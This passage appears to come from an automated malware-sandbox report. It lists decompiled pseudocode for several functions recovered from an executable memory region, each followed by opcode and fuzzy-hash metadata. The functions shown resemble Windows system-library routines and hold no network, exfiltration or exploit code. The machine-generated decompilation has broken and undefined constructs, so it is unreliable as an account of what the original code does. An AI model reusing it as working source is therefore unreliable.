                        					L6:
                        					_t31 = 0;
                        					L7:
                        					return _t31;
                        				}
                        				_t32 = _t30 + 0x5d8;
                        				if(_t32 == 0) {
                        					goto L6;
                        				}
                        				_t59 = _t32 + 0x30;
                        				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                        					goto L6;
                        				}
                        				if(__ecx != 0) {
                        					 *((intOrPtr*)(__ecx)) = 0;
                        					 *((intOrPtr*)(__ecx + 4)) = 0;
                        				}
                        				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                        					_t51 =  *(_t32 + 0x10);
                        					_t33 = _t32 + 0x10;
                        					_v20 = _t33;
                        					_t54 =  *(_t33 + 4);
                        					if((_t51 | _t54) == 0) {
                        						_t37 = E02B25E50(0x2ad67cc, 0, 0,  &_v12);
                        						if(_t37 != 0) {
                        							goto L6;
                        						}
                        						_t52 = _v8;
                        						asm("lock cmpxchg8b [esi]");
                        						_t64 = _v16;
                        						_t49 = _t37;
                        						_v20 = 0;
                        						if(_t37 == 0) {
                        							if(_t64 != 0) {
                        								 *_t64 = _v12;
                        								 *((intOrPtr*)(_t64 + 4)) = _t52;
                        							}
                        							E02BC9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                        							_t31 = 1;
                        							goto L7;
                        						}
                        						E02AFF7C0(_t52, _v12, _t52, 0);
                        						if(_t64 != 0) {
                        							 *_t64 = _t49;
                        							 *((intOrPtr*)(_t64 + 4)) = _v20;
                        						}
                        						L12:
                        						_t31 = 1;
                        						goto L7;
                        					}
                        					if(_t61 != 0) {
                        						 *_t61 = _t51;
                        						_t61[1] = _t54;
                        					}
                        					goto L12;
                        				} else {
                        					goto L6;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 921dc4d546101be5ae9b8f8c1f1ebfd3014e22bb9ae7682c514ff3f6042494b2
                        • Instruction ID: 21a2d5704eaf85602c2aac89f5cac637f282c8d491a7892e1f2cfb9c26298e02
                        • Opcode Fuzzy Hash: 921dc4d546101be5ae9b8f8c1f1ebfd3014e22bb9ae7682c514ff3f6042494b2
                        • Instruction Fuzzy Hash: D031AF71A057218FD320CF09C804B26F7E9FB88B08F1549ADE89897351EB74E844CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E02B34A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				signed int* _v12;
                        				char _v13;
                        				signed int _v16;
                        				char _v21;
                        				signed int* _v24;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t29;
                        				signed int* _t32;
                        				signed int* _t41;
                        				signed int _t42;
                        				void* _t43;
                        				intOrPtr* _t51;
                        				void* _t52;
                        				signed int _t53;
                        				signed int _t58;
                        				void* _t59;
                        				signed int _t60;
                        				signed int _t62;
                        
                        				_t49 = __edx;
                        				_t62 = (_t60 & 0xfffffff8) - 0xc;
                        				_t26 =  *0x2bed360 ^ _t62;
                        				_v8 =  *0x2bed360 ^ _t62;
                        				_t41 = __ecx;
                        				_t51 = __edx;
                        				_v12 = __ecx;
                        				if(_a4 == 0) {
                        					if(_a8 != 0) {
                        						goto L1;
                        					}
                        					_v13 = 1;
                        					E02B12280(_t26, 0x2be8608);
                        					_t58 =  *_t41;
                        					if(_t58 == 0) {
                        						L11:
                        						E02B0FFB0(_t41, _t51, 0x2be8608);
                        						L2:
                        						 *0x2beb1e0(_a4, _a8);
                        						_t42 =  *_t51();
                        						if(_t42 == 0) {
                        							_t29 = 0;
                        							L5:
                        							_pop(_t52);
                        							_pop(_t59);
                        							_pop(_t43);
                        							return E02B3B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                        						}
                        						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                        						if(_v21 != 0) {
                        							_t53 = 0;
                        							E02B12280(_t28, 0x2be8608);
                        							_t32 = _v24;
                        							if( *_t32 == _t58) {
                        								 *_t32 = _t42;
                        								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                        								if(_t58 != 0) {
                        									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                        									asm("sbb edi, edi");
                        									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                        								}
                        							}
                        							E02B0FFB0(_t42, _t53, 0x2be8608);
                        							if(_t53 != 0) {
                        								L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                        							}
                        						}
                        						_t29 = _t42;
                        						goto L5;
                        					}
                        					if( *((char*)(_t58 + 0x40)) != 0) {
                        						L10:
                        						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                        						E02B0FFB0(_t41, _t51, 0x2be8608);
                        						_t29 = _t58;
                        						goto L5;
                        					}
                        					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                        					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                        						goto L11;
                        					}
                        					goto L10;
                        				}
                        				L1:
                        				_v13 = 0;
                        				_t58 = 0;
                        				goto L2;
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 391541c12a4a2111ad7c0b3331c18eb3fad0a0cc8aebfd4c62c5a765417821fc
                        • Instruction ID: e436d306b804deb3be778e6e2ad0d4223b582fd39e15f24cf8dca8eb571d8b0d
                        • Opcode Fuzzy Hash: 391541c12a4a2111ad7c0b3331c18eb3fad0a0cc8aebfd4c62c5a765417821fc
                        • Instruction Fuzzy Hash: EC31DF322056509FDB329F14C984B2ABBB5FF81B14F4045E9E8A74B660CBB0E804DF85
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E02B38EC7(void* __ecx, void* __edx) {
                        				signed int _v8;
                        				signed int* _v16;
                        				intOrPtr _v20;
                        				signed int* _v24;
                        				char* _v28;
                        				signed int* _v32;
                        				intOrPtr _v36;
                        				signed int* _v40;
                        				signed int* _v44;
                        				signed int* _v48;
                        				intOrPtr _v52;
                        				signed int* _v56;
                        				signed int* _v60;
                        				signed int* _v64;
                        				intOrPtr _v68;
                        				signed int* _v72;
                        				char* _v76;
                        				signed int* _v80;
                        				signed int _v84;
                        				signed int* _v88;
                        				intOrPtr _v92;
                        				signed int* _v96;
                        				intOrPtr _v100;
                        				signed int* _v104;
                        				signed int* _v108;
                        				char _v140;
                        				signed int _v144;
                        				signed int _v148;
                        				signed int* _v152;
                        				char _v156;
                        				signed int* _v160;
                        				char _v164;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t67;
                        				intOrPtr _t70;
                        				void* _t71;
                        				void* _t72;
                        				signed int _t73;
                        
                        				_t69 = __edx;
                        				_v8 =  *0x2bed360 ^ _t73;
                        				_t48 =  *[fs:0x30];
                        				_t72 = __edx;
                        				_t71 = __ecx;
                        				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                        					_t48 = E02B24E70(0x2be86e4, 0x2b39490, 0, 0);
                        					if( *0x2be53e8 > 5 && E02B38F33(0x2be53e8, 0, 0x2000) != 0) {
                        						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                        						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                        						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                        						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                        						_v108 =  &_v84;
                        						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                        						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                        						_v76 =  &_v156;
                        						_t70 = 8;
                        						_v60 =  &_v144;
                        						_t67 = 4;
                        						_v44 =  &_v148;
                        						_v152 = 0;
                        						_v160 = 0;
                        						_v104 = 0;
                        						_v100 = 2;
                        						_v96 = 0;
                        						_v88 = 0;
                        						_v80 = 0;
                        						_v72 = 0;
                        						_v68 = _t70;
                        						_v64 = 0;
                        						_v56 = 0;
                        						_v52 = 0x2be53e8;
                        						_v48 = 0;
                        						_v40 = 0;
                        						_v36 = 0x2be53e8;
                        						_v32 = 0;
                        						_v28 =  &_v164;
                        						_v24 = 0;
                        						_v20 = _t70;
                        						_v16 = 0;
                        						_t69 = 0x2adbc46;
                        						_t48 = E02B77B9C(0x2be53e8, 0x2adbc46, _t67, 0x2be53e8, _t70,  &_v140);
                        					}
                        				}
                        				return E02B3B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 342574146abbc06357c88c0abb336978e4e1b43e3a1d7e31d56adfd3118c18ba
                        • Instruction ID: 722536487b90d5cb7bf18d58e84438d9765db85eb475720425f2c70d83bffe00
                        • Opcode Fuzzy Hash: 342574146abbc06357c88c0abb336978e4e1b43e3a1d7e31d56adfd3118c18ba
                        • Instruction Fuzzy Hash: 4C4193B1D003189EDB24CFAAD980AADFBF5FB48310F5081AEE519A7600DB709A84CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 74%
                        			E02B2E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                        				intOrPtr* _v0;
                        				signed char _v4;
                        				signed int _v8;
                        				void* __ecx;
                        				void* __ebp;
                        				void* _t37;
                        				intOrPtr _t38;
                        				signed int _t44;
                        				signed char _t52;
                        				void* _t54;
                        				intOrPtr* _t56;
                        				void* _t58;
                        				char* _t59;
                        				signed int _t62;
                        
                        				_t58 = __edx;
                        				_push(0);
                        				_push(4);
                        				_push( &_v8);
                        				_push(0x24);
                        				_push(0xffffffff);
                        				if(E02B39670() < 0) {
                        					L02B4DF30(_t54, _t58, _t35);
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					_push(_t54);
                        					_t52 = _v4;
                        					if(_t52 > 8) {
                        						_t37 = 0xc0000078;
                        					} else {
                        						_t38 =  *0x2be7b9c; // 0x0
                        						_t62 = _t52 & 0x000000ff;
                        						_t59 = L02B14620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                        						if(_t59 == 0) {
                        							_t37 = 0xc0000017;
                        						} else {
                        							_t56 = _v0;
                        							 *(_t59 + 1) = _t52;
                        							 *_t59 = 1;
                        							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                        							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                        							_t44 = _t62 - 1;
                        							if(_t44 <= 7) {
                        								switch( *((intOrPtr*)(_t44 * 4 +  &M02B2E810))) {
                        									case 0:
                        										L6:
                        										 *((intOrPtr*)(_t59 + 8)) = _a8;
                        										goto L7;
                        									case 1:
                        										L13:
                        										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                        										goto L6;
                        									case 2:
                        										L12:
                        										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                        										goto L13;
                        									case 3:
                        										L11:
                        										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                        										goto L12;
                        									case 4:
                        										L10:
                        										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                        										goto L11;
                        									case 5:
                        										L9:
                        										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                        										goto L10;
                        									case 6:
                        										L17:
                        										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                        										goto L9;
                        									case 7:
                        										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                        										goto L17;
                        								}
                        							}
                        							L7:
                        							 *_a40 = _t59;
                        							_t37 = 0;
                        						}
                        					}
                        					return _t37;
                        				} else {
                        					_push(0x20);
                        					asm("ror eax, cl");
                        					return _a4 ^ _v8;
                        				}
                        			}


















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e3f1c6b9c546025657e7f506b199c20ec28064430973c1473c00618c9dfd1285
                        • Instruction ID: 01299d9e423261350e461aad1de54541aefd3926de4cdf110de7d3ec7c4a5d91
                        • Opcode Fuzzy Hash: e3f1c6b9c546025657e7f506b199c20ec28064430973c1473c00618c9dfd1285
                        • Instruction Fuzzy Hash: 38318C75A14249AFD704CF29D840B9AB7E4FB08314F1482A6FA08CB351D631E894CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E02B2BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				void* __ebx;
                        				void* __edi;
                        				intOrPtr _t22;
                        				intOrPtr* _t41;
                        				intOrPtr _t51;
                        
                        				_t51 =  *0x2be6100; // 0x5
                        				_v12 = __edx;
                        				_v8 = __ecx;
                        				if(_t51 >= 0x800) {
                        					L12:
                        					return 0;
                        				} else {
                        					goto L1;
                        				}
                        				while(1) {
                        					L1:
                        					_t22 = _t51;
                        					asm("lock cmpxchg [ecx], edx");
                        					if(_t51 == _t22) {
                        						break;
                        					}
                        					_t51 = _t22;
                        					if(_t22 < 0x800) {
                        						continue;
                        					}
                        					goto L12;
                        				}
                        				E02B12280(0xd, 0xdb7f1a0);
                        				_t41 =  *0x2be60f8; // 0x0
                        				if(_t41 != 0) {
                        					 *0x2be60f8 =  *_t41;
                        					 *0x2be60fc =  *0x2be60fc + 0xffff;
                        				}
                        				E02B0FFB0(_t41, 0x800, 0xdb7f1a0);
                        				if(_t41 != 0) {
                        					L6:
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                        					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                        					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                        					do {
                        						asm("lock xadd [0x2be60f0], ax");
                        						 *((short*)(_t41 + 0x34)) = 1;
                        					} while (1 == 0);
                        					goto L8;
                        				} else {
                        					_t41 = L02B14620(0x2be6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                        					if(_t41 == 0) {
                        						L11:
                        						asm("lock dec dword [0x2be6100]");
                        						L8:
                        						return _t41;
                        					}
                        					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                        					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                        					if(_t41 == 0) {
                        						goto L11;
                        					}
                        					goto L6;
                        				}
                        			}











                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b8544b2deb115bfae5b465aa83b993e98d4f62a6cf6628e63e6f3e6109a78bdf
                        • Instruction ID: f2a0ae81f1034be34475d37831802eede0808734a9b71047c515f85794cfe571
                        • Opcode Fuzzy Hash: b8544b2deb115bfae5b465aa83b993e98d4f62a6cf6628e63e6f3e6109a78bdf
                        • Instruction Fuzzy Hash: B231DF72A00725DBCF11DF58C4C0BA673A9EB28358F0448B9ED49DF202EB74D94ACB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E02AF9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                        				signed int _t53;
                        				signed int _t56;
                        				signed int* _t60;
                        				signed int _t63;
                        				signed int _t66;
                        				signed int _t69;
                        				void* _t70;
                        				intOrPtr* _t72;
                        				void* _t78;
                        				void* _t79;
                        				signed int _t80;
                        				intOrPtr _t82;
                        				void* _t85;
                        				void* _t88;
                        				void* _t89;
                        
                        				_t84 = __esi;
                        				_t70 = __ecx;
                        				_t68 = __ebx;
                        				_push(0x2c);
                        				_push(0x2bcf6e8);
                        				E02B4D0E8(__ebx, __edi, __esi);
                        				 *((char*)(_t85 - 0x1d)) = 0;
                        				_t82 =  *((intOrPtr*)(_t85 + 8));
                        				if(_t82 == 0) {
                        					L4:
                        					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                        						E02BC88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                        					}
                        					L5:
                        					return E02B4D130(_t68, _t82, _t84);
                        				}
                        				_t88 = _t82 -  *0x2be86c0; // 0x6007b0
                        				if(_t88 == 0) {
                        					goto L4;
                        				}
                        				_t89 = _t82 -  *0x2be86b8; // 0x0
                        				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					goto L4;
                        				} else {
                        					E02B12280(_t82 + 0xe0, _t82 + 0xe0);
                        					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                        					__eflags =  *((char*)(_t82 + 0xe5));
                        					if(__eflags != 0) {
                        						E02BC88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                        						goto L12;
                        					} else {
                        						__eflags =  *((char*)(_t82 + 0xe4));
                        						if( *((char*)(_t82 + 0xe4)) == 0) {
                        							 *((char*)(_t82 + 0xe4)) = 1;
                        							_push(_t82);
                        							_push( *((intOrPtr*)(_t82 + 0x24)));
                        							E02B3AFD0();
                        						}
                        						while(1) {
                        							_t60 = _t82 + 8;
                        							 *(_t85 - 0x2c) = _t60;
                        							_t68 =  *_t60;
                        							_t80 = _t60[1];
                        							 *(_t85 - 0x28) = _t68;
                        							 *(_t85 - 0x24) = _t80;
                        							while(1) {
                        								L10:
                        								__eflags = _t80;
                        								if(_t80 == 0) {
                        									break;
                        								}
                        								_t84 = _t68;
                        								 *(_t85 - 0x30) = _t80;
                        								 *(_t85 - 0x24) = _t80 - 1;
                        								asm("lock cmpxchg8b [edi]");
                        								_t68 = _t84;
                        								 *(_t85 - 0x28) = _t68;
                        								 *(_t85 - 0x24) = _t80;
                        								__eflags = _t68 - _t84;
                        								_t82 =  *((intOrPtr*)(_t85 + 8));
                        								if(_t68 != _t84) {
                        									continue;
                        								}
                        								__eflags = _t80 -  *(_t85 - 0x30);
                        								if(_t80 !=  *(_t85 - 0x30)) {
                        									continue;
                        								}
                        								__eflags = _t80;
                        								if(_t80 == 0) {
                        									break;
                        								}
                        								_t63 = 0;
                        								 *(_t85 - 0x34) = 0;
                        								_t84 = 0;
                        								__eflags = 0;
                        								while(1) {
                        									 *(_t85 - 0x3c) = _t84;
                        									__eflags = _t84 - 3;
                        									if(_t84 >= 3) {
                        										break;
                        									}
                        									__eflags = _t63;
                        									if(_t63 != 0) {
                        										L40:
                        										_t84 =  *_t63;
                        										__eflags = _t84;
                        										if(_t84 != 0) {
                        											_t84 =  *(_t84 + 4);
                        											__eflags = _t84;
                        											if(_t84 != 0) {
                        												 *0x2beb1e0(_t63, _t82);
                        												 *_t84();
                        											}
                        										}
                        										do {
                        											_t60 = _t82 + 8;
                        											 *(_t85 - 0x2c) = _t60;
                        											_t68 =  *_t60;
                        											_t80 = _t60[1];
                        											 *(_t85 - 0x28) = _t68;
                        											 *(_t85 - 0x24) = _t80;
                        											goto L10;
                        										} while (_t63 == 0);
                        										goto L40;
                        									}
                        									_t69 = 0;
                        									__eflags = 0;
                        									while(1) {
                        										 *(_t85 - 0x38) = _t69;
                        										__eflags = _t69 -  *0x2be84c0;
                        										if(_t69 >=  *0x2be84c0) {
                        											break;
                        										}
                        										__eflags = _t63;
                        										if(_t63 != 0) {
                        											break;
                        										}
                        										_t66 = E02BC9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                        										__eflags = _t66;
                        										if(_t66 == 0) {
                        											_t63 = 0;
                        											__eflags = 0;
                        										} else {
                        											_t63 = _t66 + 0xfffffff4;
                        										}
                        										 *(_t85 - 0x34) = _t63;
                        										_t69 = _t69 + 1;
                        									}
                        									_t84 = _t84 + 1;
                        								}
                        								__eflags = _t63;
                        							}
                        							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                        							 *((char*)(_t82 + 0xe5)) = 1;
                        							 *((char*)(_t85 - 0x1d)) = 1;
                        							L12:
                        							 *(_t85 - 4) = 0xfffffffe;
                        							E02AF922A(_t82);
                        							_t53 = E02B17D50();
                        							__eflags = _t53;
                        							if(_t53 != 0) {
                        								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        							} else {
                        								_t56 = 0x7ffe0386;
                        							}
                        							__eflags =  *_t56;
                        							if( *_t56 != 0) {
                        								_t56 = E02BC8B58(_t82);
                        							}
                        							__eflags =  *((char*)(_t85 - 0x1d));
                        							if( *((char*)(_t85 - 0x1d)) != 0) {
                        								__eflags = _t82 -  *0x2be86c0; // 0x6007b0
                        								if(__eflags != 0) {
                        									__eflags = _t82 -  *0x2be86b8; // 0x0
                        									if(__eflags == 0) {
                        										_t79 = 0x2be86bc;
                        										_t72 = 0x2be86b8;
                        										goto L18;
                        									}
                        									__eflags = _t56 | 0xffffffff;
                        									asm("lock xadd [edi], eax");
                        									if(__eflags == 0) {
                        										E02AF9240(_t68, _t82, _t82, _t84, __eflags);
                        									}
                        								} else {
                        									_t79 = 0x2be86c4;
                        									_t72 = 0x2be86c0;
                        									L18:
                        									E02B29B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                        								}
                        							}
                        							goto L5;
                        						}
                        					}
                        				}
                        			}



















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 75e1e621a648d6e654159224faad27f712ccb9650900c099ebb28d9f5fe07447
                        • Instruction ID: 20ff66ef84dde10e26a3a279c8a14bd0b6ff0c4165bddc8591505b53e5e53bdd
                        • Opcode Fuzzy Hash: 75e1e621a648d6e654159224faad27f712ccb9650900c099ebb28d9f5fe07447
                        • Instruction Fuzzy Hash: DB3109B1E00646DFDBA5DFE8C0C8B9EB7F2BB48354F1481A9E50467350CB38A984CB55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 60%
                        			E02B21DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                        				char _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr* _v20;
                        				void* _t22;
                        				char _t23;
                        				void* _t36;
                        				intOrPtr _t42;
                        				intOrPtr _t43;
                        
                        				_v12 = __ecx;
                        				_t43 = 0;
                        				_v20 = __edx;
                        				_t42 =  *__edx;
                        				 *__edx = 0;
                        				_v16 = _t42;
                        				_push( &_v8);
                        				_push(0);
                        				_push(0);
                        				_push(6);
                        				_push(0);
                        				_push(__ecx);
                        				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                        				_push(_t36);
                        				_t22 = E02B1F460();
                        				if(_t22 < 0) {
                        					if(_t22 == 0xc0000023) {
                        						goto L1;
                        					}
                        					L3:
                        					return _t43;
                        				}
                        				L1:
                        				_t23 = _v8;
                        				if(_t23 != 0) {
                        					_t38 = _a4;
                        					if(_t23 >  *_a4) {
                        						_t42 = L02B14620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                        						if(_t42 == 0) {
                        							goto L3;
                        						}
                        						_t23 = _v8;
                        					}
                        					_push( &_v8);
                        					_push(_t23);
                        					_push(_t42);
                        					_push(6);
                        					_push(_t43);
                        					_push(_v12);
                        					_push(_t36);
                        					if(E02B1F460() < 0) {
                        						if(_t42 != 0 && _t42 != _v16) {
                        							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                        						}
                        						goto L3;
                        					}
                        					 *_v20 = _t42;
                        					 *_a4 = _v8;
                        				}
                        				_t43 = 1;
                        				goto L3;
                        			}


                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                        • Instruction ID: 2a1dcad6f5c9ef56f8bff76bc6c2084ce6bb07a932b8effbbda4b7c4ff111758
                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                        • Instruction Fuzzy Hash: 9F21BF32610228EBC720DF99CC80EAABBBDEF85644F104095E909A7211D774AE01CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E02B10050(void* __ecx) {
                        				signed int _v8;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr* _t30;
                        				intOrPtr* _t31;
                        				signed int _t34;
                        				void* _t40;
                        				void* _t41;
                        				signed int _t44;
                        				intOrPtr _t47;
                        				signed int _t58;
                        				void* _t59;
                        				void* _t61;
                        				void* _t62;
                        				signed int _t64;
                        
                        				_push(__ecx);
                        				_v8 =  *0x2bed360 ^ _t64;
                        				_t61 = __ecx;
                        				_t2 = _t61 + 0x20; // 0x20
                        				E02B29ED0(_t2, 1, 0);
                        				_t52 =  *(_t61 + 0x8c);
                        				_t4 = _t61 + 0x8c; // 0x8c
                        				_t40 = _t4;
                        				do {
                        					_t44 = _t52;
                        					_t58 = _t52 & 0x00000001;
                        					_t24 = _t44;
                        					asm("lock cmpxchg [ebx], edx");
                        					_t52 = _t44;
                        				} while (_t52 != _t44);
                        				if(_t58 == 0) {
                        					L7:
                        					_pop(_t59);
                        					_pop(_t62);
                        					_pop(_t41);
                        					return E02B3B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                        				}
                        				asm("lock xadd [esi], eax");
                        				_t47 =  *[fs:0x18];
                        				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                        				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                        				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                        				if(_t30 != 0) {
                        					if( *_t30 == 0) {
                        						goto L4;
                        					}
                        					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        					L5:
                        					if( *_t31 != 0) {
                        						_t18 = _t61 + 0x78; // 0x78
                        						E02BC8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                        					}
                        					_t52 =  *(_t61 + 0x5c);
                        					_t11 = _t61 + 0x78; // 0x78
                        					_t34 = E02B29702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                        					_t24 = _t34 | 0xffffffff;
                        					asm("lock xadd [esi], eax");
                        					if((_t34 | 0xffffffff) == 0) {
                        						 *0x2beb1e0(_t61);
                        						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                        					}
                        					goto L7;
                        				}
                        				L4:
                        				_t31 = 0x7ffe0386;
                        				goto L5;
                        			}


                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • Opcode ID: 18032410502b28624a61534d306fda4ff3188ae1ac31d7d290b6765319b548f9
                        • Instruction ID: 7570815e066e99fa343223c52d307ada21b662c1d97ea79682c0e721b2b22a80
